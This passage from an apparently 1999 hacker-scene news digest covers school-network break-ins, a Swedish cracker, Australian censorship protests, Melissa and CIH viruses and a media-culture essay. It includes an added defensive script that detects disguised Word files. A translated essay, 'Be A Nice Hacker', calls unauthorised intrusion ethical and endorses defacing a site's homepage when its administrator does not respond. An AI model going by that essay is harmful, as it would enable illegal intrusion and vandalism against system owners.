Still, he said, the high school's computer network connects to the districtwide system, meaning the students could have eventually broken into financial and payroll records or general personnel files.

"It could have been very disruptive," Haller said. "They could have shut down the whole system."

The arrested students either preferred not to comment or could not be reached for comment.

Robin Alverson, Steven Alverson's mother, said her son insisted he was innocent of any criminal wrongdoing and offered to take a lie detector test or voice-stress analysis to prove it.

"Steven is very computer literate," Robin Alverson said. "He is not stupid. He knows that anything he does on there can be traced. That's the thing that gets me."

One of their classmates, who asked not to be identified, said he thought the group had simply downloaded games off the Internet and that one had a virus attached to it.

But sheriff's reports describe a highly technical process - set in motion Jan. 4 - involving hidden and renamed viruses that blocked administrators' access to their files, making the path more difficult to trace.
"These students were very good," Flagler County School Superintendent Robert Williams said, alleging that they viewed breaking into the system as a challenge or game. "They were running our people ragged trying to keep up with them."

Williams added that it was the first time the district has dealt with unauthorized internal computer access, and that the disciplinary code will be revamped accordingly over the summer.

The high school has four classroom computer labs, and Haller estimated the school has more than 100 computers that connect to the Internet. In the fall, each student is given his or her own password-protected computer account to do research or work on word processing programs. Students and parents must sign an agreement on proper use.

"Some of them choose to use their talents inappropriately," Haller said, adding that peer pressure may have played a role. "Whether it's a macho thing, whether it was a battle over school territory or whether they were out to prove a point - 'We're smarter than you' - it's hard to say."

And as recent news reports demonstrate, even large agencies such as NASA are not insulated from the potential for break-ins.

"We're a high school," Haller said. "We don't begin to have the kinds of resources that the federal government has for protection."

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

21.0 Danes Finger Swede for Cracking 12,000 Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Phoz

The Danish Police Computer Crime Unit have exposed a 17-year old from Sweden claiming that he broke into at least 12,000 computers worldwide, including military, bank, and university owned systems. The reports indicate that he used an automated version of a BIND vulnerability to gain access and has been compromising systems since early 1997.

phoz.dk - Translated News Reports.
http://phoz.dk/news/260599.html

@HWA

22.0 EFA Plans Net Censorship Demonstrations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by photon

The Electronic Frontiers Australia have announced several protest events to take place on Friday May 28. Local groups around Australia have been urged to co-ordinate protests against government censorship. Australia's proposed internet censorship legislation passed the Senate on Wednesday, and is expected to pass through the House of Representatives some time next week.

Electronic Frontiers Australia
http://www.efa.org.au

Broadcasting Services Amendment (Online Services) Bill 1999
http://www.ozemail.com/~mbaker/amended.html

List of Australian Representatives
http://www.aph.gov.au/

Sydney Morning Herald
http://www.smh.com.au/news/9905/27/pageone/pageone7.html

Thursday, May 27, 1999

Internet providers plotting revenge over bill

By LAUREN MARTIN, in Canberra

Angry Internet service providers turned on the Government after its bill to censor the Internet passed the Senate yesterday.

Requests from Government computer users were diverted to a protest page which made the users wait 120 seconds before reaching their desired destination. "Get used to the delay," came the message. It was a warning that the plan would slow the system.

Civil libertarians also protested by turning their computer Web site screens black to mark their belief that the Government had - in the words of Democrats Senator Natasha Stott Despoja - "turned its back on the Internet".

Anti-censorship group Electronic Frontiers Australia is organising nationwide rallies for tomorrow in the real world - Sydney, Melbourne, Perth, Brisbane, Adelaide and Wollongong.

One family-owned Internet provider in western Sydney, RP Internet Services, yesterday was offering a month's untimed calls or 500 megabytes of data for clients who showed up.
The company hopes to hire a hearse for the Sydney protest, which will move from Hyde Park to the offices of the Australian Broadcasting Authority and the Office of Film and Literature Classification.

Already one West Australian-based ISP had sent each senator a copy of George Orwell's 1984, with a note: "The Online Services Bill is Orwellian in its implications. It has no place in a free society."

But the bill is expected to move smoothly through the House of Representatives and become law. It outlines a complaints-based regime under which the ABA can force Internet providers to remove material which would be considered offensive or illegal under film and video guidelines. If the material is not removed within one working day, ISPs face penalties of tens of thousands of dollars.

The chief executive of the Internet Industry Association, Mr Peter Coroneous, said the bill represented a "huge challenge".

"This has never been attempted anywhere in the world before, and people must realise that we cannot necessarily come out with a magic bullet tomorrow."

The Communications Minister, Senator Alston, said the bill would "protect Australian citizens, especially children" from unsuitable Internet sites.

But EFA president and Internet lawyer, Mr Kim Heitman, said it would not protect anyone. International sites (more than 90 million) could not be effectively blocked, he said. Adult sites based in Australia would move offshore or underground.

"The internet is going to effortlessly evade the bill," Mr Heitman said. "It does nothing but make us an international laughing stock for saying we can do the impossible - it's a con job ...

"If the Government was serious about Internet content, they would pay to educate parents and give police the resources to hunt down people who create illegal content."
@HWA

23.0 Design Principles for Tamper-Resistant Smart Card Processors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Silicosis

The Advanced Digital Security Research Department of the University of Cambridge Computer Laboratory has released an excellent paper on the security weaknesses of smart cards and describes several methods of extracting protected data and software from smart card processors. Anyone who has been doing any smart card hacking should probably read this.

Design Principles for Tamper-Resistant Smart Card Processors
http://www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf

@HWA

24.0 Melissa finds a mate
~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Melissa will not Die

contributed by nVirb

Variants of the Word macro virus known as Melissa continue to appear. This time the mutant disguises itself in a '.rtf' named document as opposed to '.doc', which helps to hide it from anti-virus software. It has been speculated that Melissa and a virus known as CAP, discovered in 1997, may have met in the wild and mutated together.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11162,00.html

Melissa Mutant Appears

Virus variation is disguised as an RTF file and hides from vaccines.

by Matthew Nelson, InfoWorld Electric
May 27, 1999, 3:55 a.m. PT

The Melissa virus, which swept across networks around the world last month, has popped up again in a mutated format, which may have occurred when it came into contact with another virus.

Melissa's latest variation uses a macro virus to replicate itself across networks as the original did, but now it changes the file extension of the Word document from .doc to .rtf. This may effectively camouflage the virus from antivirus systems that look only for the .doc version of the attack. The virus is not actually an RTF document, but is a Word file masquerading as an RTF file, as RTF files cannot contain macros.
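Because the disguise is only a rename, a defender can catch it by trusting the bytes rather than the extension: a real RTF document begins with the literal control word "{\rtf", while a binary Word file is an OLE2 compound document with a fixed eight-byte header. The check below is an added example, not code from the PC World article or from any antivirus vendor; the sample attachments and subject lines are constructed.

```python
import re

# A real RTF document starts with this control word; a binary Word .doc is an
# OLE2 compound file whose first eight bytes are this signature.
RTF_MAGIC = b"{\\rtf"
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

# Subject-line pattern the article quotes as the Melissa profile.
MELISSA_SUBJECT = re.compile(r"^important message from", re.IGNORECASE)


def sniff_format(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring whatever it is named."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"      # binary Word/Excel container; can carry macros
    if data.lstrip().startswith(RTF_MAGIC):
        return "rtf"       # plain-text RTF; cannot carry VBA macros
    return "unknown"


def check_attachment(filename: str, data: bytes, subject: str = "") -> dict:
    """Return a verdict for one mail attachment.

    A file named .rtf whose bytes are an OLE2 container is exactly the
    disguise described above: Word opens it by content and runs its macros,
    while a scanner keyed on the .doc extension never looks at it.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    fmt = sniff_format(data)
    reasons = []
    if ext == "rtf" and fmt == "ole2":
        reasons.append("extension .rtf but content is an OLE2 (Word binary) file")
    if ext == "doc" and fmt == "rtf":
        # Harmless by itself, but still an extension/content mismatch worth logging.
        reasons.append("extension .doc but content is plain RTF")
    if fmt == "ole2" and MELISSA_SUBJECT.match(subject.strip()):
        reasons.append("OLE2 attachment with Melissa-style subject line")
    return {
        "filename": filename,
        "extension": ext,
        "content": fmt,
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Constructed samples: a minimal OLE2 header padded to one sector, and a
# minimal RTF document. Neither is a real virus.
SAMPLE_OLE2 = OLE2_MAGIC + b"\x00" * 504
SAMPLE_RTF = b"{\\rtf1\\ansi Hello}"

if __name__ == "__main__":
    for name, blob, subj in [
        ("list.rtf", SAMPLE_OLE2, "Important Message From Alice"),
        ("notes.rtf", SAMPLE_RTF, "minutes"),
        ("list.doc", SAMPLE_OLE2, "quarterly report"),
    ]:
        v = check_attachment(name, blob, subj)
        print(name, "->", "SUSPICIOUS" if v["suspicious"] else "ok", v["reasons"])
```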
"An RTF file cannot contain macros, so it cannot contain macro viruses," says Sal Viveros, group marketing manager for Total Virus Defense at Network Associates, which was contacted about the virus by a user. "But with Word you can name your extensions any name you want, so all this virus writer did was change the list.doc in Melissa to list.rtf."

Mutating in the Wild?

The RTF Melissa virus is similar to the CAP virus, which was discovered in 1997 and altered .doc files to .rtf files. CAP was summarily added to antivirus application lists to guard against. But given the similarity of the two viruses, and the possible results of an interaction between the two, Viveros speculates that the two viruses might have met and mutated in the wild.

If a system infected with CAP virus also contracted Melissa, then CAP could have altered the Melissa files to replicate as RTF files and then continued to spread the infection.

"It could have been that someone had the CAP virus on their system who got infected by Melissa," says Viveros. "Maybe it was accidental that this was changed to RTF." There is no way to be sure, Viveros adds.

This new version of the Melissa virus is one of many copycat viruses discovered since the initial outbreak of the virus. To protect against the latest version of Melissa, Network Associates and other antivirus vendors recommend that you update your antivirus data definitions regularly and be cautious opening suspicious messages, especially ones fitting the Melissa profile of "Important message from ..".

@HWA

25.0 punkz.com sets up a feedback page for the presidential 'cyberwar'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

The Internet a Tool of War?

contributed by simonsays

Should the United States use the Internet as a tool of war?
A page has now been set up where you can email the President with your concerns in response to the allegation that the CIA will break into various banks to mess with official Yugoslavian bank accounts.

punkz.com/sixtoed

@HWA

26.0 It's that time of month again, when the 26th rolls around, look out...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I thought we already had a fix for the CIH virus but apparently the Aussies want in on the action as well so here's yet another one... -Ed

Chernobyl Virus Cure Found in Australia

contributed by nvirB

With the 26th of the month arriving quickly developers have been scrambling to create a fix for variants of the CIH or Chernobyl Virus which may strike tomorrow. CIH attacks a system by corrupting both the File Allocation Table and the BIOS. Developers in Australia claim that they have created a program that will rebuild the FAT table of an infected system. However, they have been unable to solve the BIOS corruption problem.

News.com.au
http://technology.news.com.au/techno/4286612.htm

Local developer nukes Chernobyl bug

By IAN GRAYSON
25may99

A QUEENSLAND software expert has developed a fix for the malevolent CIH virus, which corrupts hard drives, making PCs inoperable.

The virus, dubbed Chernobyl because it struck on the anniversary of the nuclear accident, hit hundreds of thousands of PCs worldwide on April 26.

CIH virus outbreaks have been most prevalent in the Asian region. Some experts say this is because of the large amount of pirated software in use there, and the fact that many CDs were infected at the time of manufacture.

A variant of the virus has been found that will trigger tomorrow, and could continue to strike on the 26th of each month until it is removed from a system.

Virus expert with Queensland firm Hamilton Multi-media, James Wallis, said he had created a fix that overcame the impact of the virus, allowing users to access data on their hard drives.
"We sat down and figured out exactly how the virus corrupts the disks and set out to develop a way to fix it," he said. Mr Wallis said it took six 14-hour days to create the fix. The company has made the fix available as a free download from its Web site. He said the virus could be beaten because only data in the first portion of a hard drive, including the file allocation table, was corrupted. The remainder was left intact but inaccessible until the lost section was rebuilt. "Our program starts at the end of the disk and works backwards," he said. "Using sophisticated algorithms, it recreates the data at the beginning of the drive." Mr Wallis said the fix had been used successfully to resurrect more than a dozen infected hard drives brought in by customers. More than 180 copies of the fix had been downloaded from the Web site in the week after it was made available. But Mr Wallis said little could be done for PCs in which the virus had also attacked the BIOS chip. "In many cases it is a matter of having to replace the chip because there is nothing that can be done in software to fix it." 27.0 Submission: "Be A Nice Hacker" by System ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ be a nice hacker... by system ( 21st may 1999). -------------------------------------------------------------------------------- [ Introduction. ] I made this articles because there are so much cracker than a real hackers in Indonesia and all over the world. -------------------------------------------------------------------------------- [ General description. ] A hacker is a people that can enter into some computer system without anybody know about it. Generally a hacker do not intend to publish this interruption to the internet communities, they don't like publication, they only want tray their security, isn't it good or bad. 
If they find that the security is bad or weak, they will tell the administrator that there is a hole in their system, and suggest that the administrator fix it before something bad happens to their system. But these days, these things are being forgotten by those who call themselves hackers. There are so many hacking / cracking scenes at this time that exist only for publication purposes. They don't obey the ethics behind the underground world.

--------------------------------------------------------------------------------
[ A detailed description. ]

Being a hacker, you must remember one thing: " DO NOT INTEND TO BREAK THE SYSTEM ". We must keep this thing in ourselves, if you are a real hacker of course. A hacker, as I already told you at the front of this article, only gets inside the system and looks around; if they find any hole in the system, they will tell the administrator about the hole. The hacker never breaks or changes the data that is inside that system. Even if they have the capability to break and change that data, look, they only look, read, and study it; if it is good for them they keep it in their mind, if not they leave it without a trace.

I know this probably sounds pretty boring for you guys that just got into this scene, and sometimes the question that exists in your mind is " So what's the benefit for me ? ". Well, the benefit is the knowledge that you get; a hacker never does something for their own purpose. They only study and study to get a lot of knowledge. So what's the deal with this knowledge ? To answer this question, you must look at the things surrounding you. Let's see the easy one: the monitor, the keyboard, the CPU, the mouse that you are using right now, where do they come from ? From science, isn't it ? Where does science come from ? From knowledge, isn't it ?
Knowledge is the most important thing in this world, and I believe all knowledge will be used, maybe not at this time, but it will be in the next couple of years or more. Try to think objectively: in old times Leonardo da Vinci painted how the helicopter works in his notepad, and as all of you know, at his time people did not even have any conception of a flying copter. But a few years later, that could happen, like now. You see, that is the real value of knowledge. Too bad these values of knowledge have been forgotten just like that; many of our pals from Indonesia would rather break the system and change the data that exists on it. One thing that really occurs in Indonesia is that they only want to get free internet accounts rather than knowledge. If this still happens in the next couple of years, what is the main purpose of the internet ? I tell you this not to make certain people happy, but this negative phenomenon should go away from Indonesia, because Indonesian people cannot think smart if they keep using the internet in a wrong way. Some people tell me that this is an equal position, because the telephone and internet fees in Indonesia are very expensive if we compare them with other countries. Yes, this is true, but this is wrong thinking. Don't look from one side, but look at two sides or more. If you are on the ISP and Telephone side, you will see what is happening to them. They will go broke if you still do this.

Okay, back to the main subject. Why do Indonesian hackers like to break the system ? I am not 100% sure, but I think this happens because they lack information, especially the ethics of the underground world. It is our job to tell them so that this will not happen again in the future. I'm not a hacker, but I will tell you some ethics that I know :

- Do not break the system
- Do not change the data that exists on the system
- Tell the administrator the hole that you have found
- Don't even try to delete all files in their system.
  ( If on a Web server, please don't delete all HTML / Scripts in their directory; if the administrator doesn't respond to your email, change the index.html with your own words, but keep the old one, rename the old one, for example oldindex.html; as I know this only happens if the administrator does not respond to your email in 48 hours ).
- And for the administrator, you also need to obey the ethics. Keep the hacked version of index.html for 24 hours.

Let me tell you, if you obey these ethics, people will respect you, and you could even be friends with the administrator in no time.

--------------------------------------------------------------------------------
[ Summary. ]

- Being a hacker doesn't mean you will be famous in a short time.
- A hacker's job is not an easy way.
- A hacker without ethics is just a loser mind.
- Remember, a hacker's only purpose is knowledge.

##################################################################
This article is a translated version of " Jadilah hacker yang benar " that was made by System, on Friday 21st May. You can use this article / change it as you like, as long as you give me some credit. I really like all comments / suggestions from you, please email them to system@hackerlink.or.id. Check out http://www.hackerlink.or.id for the Indonesian underground news center.
##################################################################

@HWA

28.0 Hacking Memes by Stephen Downes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Pasty Drone, NewsTrolls

Hacking Memes
(Viewing this article is illegal in Australia)

This essay is about subversion.

1. The Essence of the Meme

The concept of the meme has been working its way around the web for a while now, instantiating itself in Wired's regular feature, Hype List, in articles, and in general currency. As David Bennahum writes at the top of each issue of Meme, a meme is a contagious idea that replicates like a virus, passed on from mind to mind.
Memes function the same way genes and viruses do, propagating through communication networks and face-to-face contact between people. The tune you can't get out of your head, the phrase you keep using in your conversation, the image of the perfect donut - these are all memes, ideas which have passed from somewhere out there into your head and into your consciousness.

Transference is the essence of the meme. Principia Cybernetica Web defines it as "an information pattern, held in an individual's memory, which is capable of being copied to another individual's memory." The Hacker's Dictionary defines it as "An idea considered as a replicator, esp. with the connotation that memes parasitize people into propagating them much as viruses do."

The concept, we are told, originates in Richard Dawkins's 1976 book The Selfish Gene. The word 'meme' sounds like 'gene' and has similar properties. Humans, from the point of view of either gene or meme, are the means by which genes - or memes - are propagated. Animals, plants, and even ourselves, are merely their disposable "survival machines".

Our human capacity to communicate consists in our ability to transfer ideas from one person to another. Not to say that such transference is perfect. We all know the story where the message gets changed as it is whispered ear to ear down a line of people. But it is reliable. Most of the time, the receiver gets the information the sender wanted to convey.

Different forms of communication operate more or less effectively. A casual conversation you have on the bus will be forgotten by day's end, while this essay may linger in your mind a few days longer. Neither conversation nor essay, however, has the staying power of the McDonald's jingle (sing it with me: You deserve a break today...).

Mere transference is not sufficient. For an idea to take hold in another person, it must be internalized, it must be what Dreyfus and Dreyfus call the expert, or intuitive, state of knowledge.
From the standpoint of humans, ideas are the currency of the information economy. An idea which replicates well is worth money, because the idea that implants itself as intuitive knowledge acts as a determinant of behaviour. The best way to get a person to buy your product or to use your service is to internalize it, to make dialing 10-10-800 an action. In advertising it's an old rule of thumb: mention the product name three times in a 15 second spot. As Andrew Garton laments,

    The record industry maintains its status in the global economy and its income streams by way of repetition. Music that is played over and over again so much that it creates its own audience that in turn purchase its representation to listen to it over and over again in their homes, their cars, walkmans, bathrooms... anywhere one can think to place a speaker.

Ideas - and not just advertising - transmit themselves through repetition.

Hacking Memes

2. Advertising

Repetition alone worked in the old days of limited media. When the sources of information were few and uniform, when there were three networks and one message. Today's consumers are not only more sophisticated - merely making them remember is no longer enough - consumers are the battleground for information wars, with messages flying at them from all directions. Drive down any city street and look at the images: one in ten (if you're lucky) is an actual traffic signal; the rest are trying to implant some idea, some behaviour, into your mind.

Advertising today looks for stronger hooks, and it finds them in association and self-identification. The concept is especially simple: find (or define) a person's conception of self which is pleasing. Mold that conception such that the use of a product or service is essential to that conception. Imprint the idea that in order to be yourself, you need to purchase such-and-such a brand.

Nike, for example, understands this.
After losing market share to Reebok, Nike's new advertising campaign focussed less and less on shoes and more and more on image. As Randall Lane explains in a recent Forbes article,

    Nike's Phil Knight isn't selling shoes. He's selling attitude.... Nike would sell not shoes but the athletic ideals of determination, individuality, self-sacrifice and winning.... Nike ads almost never pitch product--or even mention the company's name. They create a mood, an attitude, and then associate the product with that mood. Call it image transfer. Cool ads, cool product. As Wieden puts it: "We don't set out to make ads. The ultimate goal is to make a connection."

The idea behind Nike's ads is to transfer a sense of identity from the person to the product.

Hacking Memes

3. The Corporate Pitch

People living in western democracies are flooded with advertising. The illusion is sustained that they are being offered choice, but in reality, they are being presented with a uniform message. Western society does not consist of many cultures; rather, more and more, they are being subsumed into a single culture.

The reality of this hit home for me when I found myself listening to - and enjoying - Meredith Brooks's recent top 10 song, Bitch, and I realized I was watching an advertisement for the movie Practical Magic. Brooks's song - fresh, rebellious, catchy - was appropriated and incorporated into the larger media package. Indeed, it seems that most popular music today ties in with a movie or television show - and that most movies and television shows tie in with additional product lines. These tie-ins define not only the breadth but also the limits of popular culture. Even rebellion is commodified - if it is not commodified, it is not shown.

'Culture' in our society - both from the popular point of view and even in academic studies - means 'mass culture', as defined by the tightly woven network of the mass media meme.
As author and pundit Carrie McLaren complains:

    The real disappointment lies in (scholars') abject inability to recognize 'popular culture' anywhere but in the officially-sanctioned showplaces of corporate America; their utter dependence on television to provide them with an imagery of rebellion.

Or as Mark Dery observes in his classic essay, Culture Jamming,

    Corporate ownership of the newsmedia, the subsumption of an ever-larger number of publishing companies and television networks into an ever-smaller number of multinationals, and the increased privatization of truth by an information-rich, technocratic elite are not newly-risen issues. More recent is the notion that the public mind is being colonized by corporate phantasms---wraithlike images of power and desire that haunt our dreams.

Hacking Memes

4. Hyper Reality

Steve Mizrach, Culture Jamming: The Information War of the 90s:

    the French philosopher Baudrillard calls our postmodern existence "hyperreality." Real experiences and things have been replaced with simulacra - copies without an original. Due to the power of mass media advertising, our relationship to the signifier has changed. Now it hides the absence of a signified: conceals the inability to deliver real satisfaction by cleverly simulating it. Part of our hyperreal lives is the fact that our simulations are more real than real. Given a better imitation, people choose it over the real thing; hence Disney's Matterhorn enjoys more visitors than the real one in Switzerland. More insidiously, through various obfuscations, people come to think the simulacrum is the real McCoy, and forget about the historical and physical reality it represents.

    Modern advertising critics like Mark Crispin Miller often note the hidden messages concealed within the cool graphics and media saturation of Madison Avenue and MTV.
    Originally, they suggest, advertising often connected the product being sold with some sort of self-image or way of life (pastoral, pleasant, family-oriented.) Often, it was conveyed that the product would somehow confer various advantages - popularity, sexiness, fame, success, power, even individuality. Today, ads are filled with a strange sort of rugged selfishness, misanthropy, and mean-spiritedness ("touch my doritos and die.") A person is told sternly to buy as much as they can of the product but never to share with friends. "Get your own," they're told. While various moral crusaders seek to combat the various sexual innuendos of TV programming, they rarely challenge the more subtle but socially disruptive images found in commercials and other advertising.

    The product, no longer able to offer satisfaction on its own ground ("a potato chip is a chip is a chip"), instead offers the consumer a chance to be part of a certain 'crowd' or 'scene.' They belong to a cool "product tribe," revelling in the image and sensibility that the product somehow mystically confers - the fetishism of commodities, hyperaccelerated for Generation X. Analysts of postindustrial America suggest this is the secret hidden within these advertising campaigns - that more and more people are being sold style, image, and celebrity, since there is no substance or material satisfaction to the product-in-itself. Concealed within the jump-cut flash of postmodern advertising is a simple code: consumption is a mode of transcendence, a way to take part in something larger than yourself, "the Pepsi Generation."

    Corporations utilize various techniques to carve Americans into various market profiles - not based on what products they use, but on what media messages they respond to. In other words, they are to be sold on the images they want to project to themselves and others, and not on the intrinsic usefulness of consumer items.
    Whatever values they supposedly respond to are translated into clever pitches, suggesting that the product somehow represents or embodies those values. Subliminal seduction has never been that important in advertising, despite the hype, but the use of semiotic strategies certainly has. Products are often "pitched" to specific ethnic groups, minorities, or sub-cultures, often using the Marcusian co-optation strategy of appealing to their own sense of difference or deviance. ("Wear our clothes, and then you'll be a real rebel.")

Hacking Memes

5. The Information War

Jesse Hirsh:

    didn't you hear? they've declared information war against everybody. yep, that's right, the digital economy is really the perpetual war economy. Like genesis the great flood is on, only we're the ones being flooded, or rather bombarded by information, seeking our conversion to the holy faith of consumerism, otherwise known as virtual reality. and of course in declaring war the state has identified its enemies and scapegoats: hackers, phreakers, and anarchists, all of whom are presumed terrorists.

We tend to think of the media message as pertaining to products and services only, and to restrict our concept of the tie-ins to toys, clothing, and running shoes. But the uniform image being broadcast extends well beyond consumer purchases; it is devoted to creating and maintaining the consumer society. No element of life is sacrosanct; all elements of society are infused.

On the one hand, non-corporate forms of information - any information - are attacked. In some cases, the strategy is straight-forwardly political. Herbert Schiller, as quoted by Dery:

    The commercialization of information, its private acquisition and sale, has become a major industry.
    While more material than ever before, in formats created for special use, is available at a price, free public information supported by general taxation is attacked by the private sector as an unacceptable form of subsidy...An individual's ability to know the actual circumstances of national and international existence has progressively diminished.

In Canada and other nations, we see this as the incessant attacks on public broadcasting networks such as the Canadian Broadcasting Corporation. On another front, it involves attacking the integrity and credibility of alternative news sources. A recent National Post article on the CBC's coverage of biotechnology is typical. The author, Terence Corcoran, writes scathingly,

    Ideology certainly dominated CBC Radio's This Morning show yesterday. Reporter Don Carty is a smooth-talking manipulator of words who gives his slanted reports a thin veneer of objectivity.

The corporate culture strives for the middle ground, to portray themselves as objective and neutral; any position from outside that camp is ridiculed as "biased" and "political".

Alternatively, public media can be co-opted. Hence, for example, the sale of the educational Access Network by the Government of Alberta to the CHUM Media Group. Or the infiltration of the American Public Broadcasting System by corporate interests, with - as Carrie McLaren observes - inevitable results:

    In the wake of the Disney/ABC merger, a Young and Rubicam (huge advertising firm) survey of 8,500 brands worldwide concluded that the most eligible brand for acquisition is the Public Broadcasting Service. Surprise, the home of "educational" programming like Barney and Nova is one big non-commercial commercial. Says PBS spokesperson Stu Kantor, "In terms of differentiation and personal relevance, it is the No. 2 (behind Disney) media brand among the total population."

The mainstream media's fostering of a sanitary corporate image extends well beyond news and advertising.
Situation comedies, dramas and movies - the mainstream of 'popular culture' - are plagued with product placement and are passed through the image scrubber before they air. NBC's handling of Atomic Train is typical of the many instances reported by the Student Activists' Network's Wayne Grytting,

    After heavily promoting the movie's factual basis, NBC suddenly changed its mind with "no input" from its parent company, GE, a big investor in nuclear power. Alerted to the "fact" that nuclear wastes are not transported by trains, they added a disclaimer emphasizing the movie's fictional character which they showed at every commercial break. Then they overdubbed every mention of nuclear waste with the phrase "hazardous waste", thereby achieving the look of a dubbed Japanese horror film.

The image of the world that we receive through popular culture - whether in music, in the cinema, or on television - is a carefully polished version of reality. Mark Dery:

    The commercialization of information, its private acquisition and sale, has become a major industry. While more material than ever before, in formats created for special use, is available at a price, free public information supported by general taxation is attacked by the private sector as an unacceptable form of subsidy...An individual's ability to know the actual circumstances of national and international existence has progressively diminished.

As the band Negativland writes,

    It is simply inconceivable that this daily, never ending stream of public suggestion and desire creation has no effect or influence on our spirits, our health, our jobs, our laws, our environment, our culture, our political process, or our national and international policy.

Hacking Memes

6. Control of the Classrooms

The battle extends to all corners of the information nation, even into the sanctity of the kindergarten classroom. Knowing that repetition and imprinting are key, advertisers are keen to infuse their message into the curriculum.
Advertisers, for example, recently placed their product in mathematics textbooks. "This looks like product placement, as they do in the movies," said David Walsh, director of the National Institute on Media and the Family, based in Minneapolis, which studies the effect of advertising on families. "The effect is the same. It gets at what I call the golden rule of influence, which is when the person being influenced doesn't even know it."

Media groups such as Channel One place television news shows into classrooms. As they say on their website,

    Channel One News is a daily, televised, 10-minute newscast that is beamed via satellite during the school year to each of the 12,000 schools in the Channel One Network community. Channel One News features stories on breaking news and in-depth issues that affect the world, the nation and specifically America's teenagers.

Leaving aside the question of advertising in education, an examination of what Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks students how they liked Star Wars, covered Alanis Morissette, commented on body image, and reported "Live from Mt. Everest". The message broadcast to students on Channel One is clear: our culture is defined by the movies and music we see and hear, our culture is the best, and the best path to self-actualization is to immerse ourselves in this culture.

Listen to Channel One on freedom in China:

    Behind the Chinese government's restrictions are cultural and historical factors. For thousands of years, Chinese culture has been based on Confucian values, in which people have a respect for authority. The ruler of the people is a father figure whom everyone must obey. The Chinese government's existing authoritarian style of leadership follows the ancient way of emperors who ruled China with "the mandate of Heaven." Individualism is not highly valued in Confucianism. Instead, people are encouraged to act in the best interest of the family and community.
The Chinese culture, according to Channel One, is inherently and irredeemably evil, based on authoritarian "Confucian" values. Such an account misrepresents both Chinese culture and Confucianism. By contrast, the American culture is painted in pure tones,

    America was founded by English colonists who wanted independence from Great Britain. The United States also has become a haven for immigrants fleeing religious and ethnic persecution in other countries. Because of these historical events, individualism and freedom is highly valued in American culture.

Here we have not only an assumption of genetic and racial purity, we also have a conflation of "freedom" and "individualism". And - leaving aside the fact that the dominant religion in the United States - Christianity - is at least as authoritarian as Confucianism - the 'fact' of freedom in the United States is traced to its religious roots.

Advertisers have long known that imprinting is best accomplished through marketing to kids. The battle for the airwaves and print media has been won. The battle for the classrooms of the nations is just being engaged.

Hacking Memes

7. The Counteroffensive: Words as Weapons

The counteroffensive is being mounted by a variety of forces who - until the advent of the internet - had few means of communication and interaction. The counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists, anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians, environmentalists and consumer advocates - has moved from the trenches of alternative cafes and billboard defacing to the mainstream of online culture.

The counteroffensive - now armed with the tools of mass media - is a guerrilla operation using the word as weapon, as described by Dery:

    The answer lies, perhaps, in the "semiological guerrilla warfare" imagined by Umberto Eco. "[T]he receiver of the message seems to have a residual freedom: the freedom to read it in a different way...I am proposing an action to urge the audience to control the message and its multiple possibilities of interpretation," he writes. "[O]ne medium can be employed to communicate a series of opinions on another medium...The universe of Technological Communication would then be patrolled by groups of communications guerrillas, who would restore a critical dimension to passive reception."
Or as the Quebec Public Interest Research Group puts it,

    We can break the homogeneity of the media monopoly by expressing ourselves with our own media. Taking back our media means taking back our freedom and engaging in a revolution of many minds against a common enemy. Through workshops, panel discussions, and lectures, events such as Liberating Media seek to encourage and inspire participants to take back our media and our freedom in the diversity of forms in which they both exist.

The methodology of counterattack involves inserting counter-memes into the media mainstream. It is the idea of the meme conceived as virus taken to its logical extreme. This idea expresses itself even in Dawkins's seminal The Selfish Gene and is operationalized in William S. Burroughs's radical treatise, The Electronic Revolution:

    The control of the mass media depends on laying down lines of association. When the lines are cut the associational connections are broken. I have frequently spoken of word and image as viruses or as acting as viruses, and this is not an allegorical comparison. You will notice that this process is continually subject to random juxtaposition. Just what sign did you see in the Green Park station as you glanced up from the People? Just who called as you were reading your letter in the Times? What were you reading when your wife broke a dish in the kitchen? An unreal paper world and yet completely real because it is actually happening.

    The underground press serves as the only effective counter to a growing power and more sophisticated technique used by establishment mass media to falsify, misrepresent, misquote, rule out of consideration as a priori ridiculous or simply ignore and blot out of existence: data, books, discoveries that they consider prejudicial to establishment interest.

    Consider the human body and nervous system as unscrambling devices.
Remember that when the human nervous system unscrambles a scrambled message this will seem to the subject like his very own ideas which just occurred to him. Consider now the human voice as a weapon. To what extent can the unaided human voice duplicate effects that can be done with a tape recorder? Learning to speak with the mouth shut, thus displacing your speech, is fairly easy. You can also learn to speak backwards, which is fairly difficult. I have seen people who can repeat what you are saying after you and finish at the same time. This is a most disconcerting trick, particularly when practiced on a mass scale at a political rally.

Or, as put less eloquently by the Church of the SubGenius:

We're the Happy People. Happy to live in a world of images. Images of war. Family. Crime. Fun images, that help rinse away unsightly self-images, so you can get away from the privacy of your own home. After all, aren't you what everything's here for? You're what we're here for. That's why we made everything! That's why everything made you. And that's why you made us. Who are we?

Hacking Memes 8. Humble Beginnings

